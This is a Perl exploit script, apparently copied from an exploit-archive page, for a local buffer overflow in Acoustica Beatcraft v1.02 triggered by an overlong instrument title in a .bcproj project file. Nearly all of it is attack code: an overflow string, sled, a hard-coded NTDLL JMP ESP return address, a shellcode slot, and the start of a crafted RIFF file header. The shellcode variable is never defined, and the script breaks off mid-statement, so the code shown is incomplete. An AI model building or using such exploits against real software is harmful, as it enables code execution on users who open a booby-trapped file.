#!/usr/bin/perl
#
# Acoustica Beatcraft (bcproj file) Local BOF Exploit
# Author: Koshi
#
# Date: 08-30-08 ( 0day )
# Application: Acoustica Beatcraft
# Version(s): v1.02 Build 19
# Site: http://acoustica.com/beatcraft/index.htm
# Tested On: Windows XP SP3 Fully Patched
#
# Acoustica Beatcraft contains a buffer prone to exploitation via an
# overly long string. The buffer contains the "title" of the "instruments"
# one can insert into a Beatcraft project. This exploit is a bit
# unstable in the fact that, to properly exploit it, one must open
# Beatcraft firstly, then proceed to open the exploit file from
# within Beatcraft. Simply double clicking the file will result
# in a simple DoS scenario. ( Hopefully I'll fix this soon )
# My guess as of now is we're not going to have it both ways.
#
# gr33tz: Rima my baby, str0ke, breaker_unit, mess'
#
my $led1 = "A"x110; # Sled ( \x41 INC ECX )
my $led2 = "A"x34; # Sled ( \x41 INC ECX )
my $buf1 = "A"x179; # Overflow
my $buff = "".
"$buf1". # Overflowage...
"$led1". # Slide on down to the jump
"\xeb\x07". # Jump NTDLL address
"\xed\x1e\x94\x7c". # NTDLL.DLL JMP ESP ( This may need to be changed to a different JMP ESP )
"\xeb\x31". # Line it up right and land into the sled
"$led2". # Slip on down to the shellcode
"$shellcode"; # ..to the beat of a different drum.
my $tuff = "".
"\x52\x49\x46\x46\xB0\x0F\x00\x00\x62\x65\x61\x74\x62\x70\x72\x6F\x30\x02\x00\x00".
"\xCD\xCC\x8C\x3F\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64".
"\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x4F\x77\x6E\x65\x72\x5C\x44\x65\x73\x6B".
"\x74\x6F\x70\x5C\x70\x6F\x63\x2E\x62\x63\x70\x72\x6F\x6A\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
You are here: hacking technology
> Exploit
> Content
Category: Home
> Exploit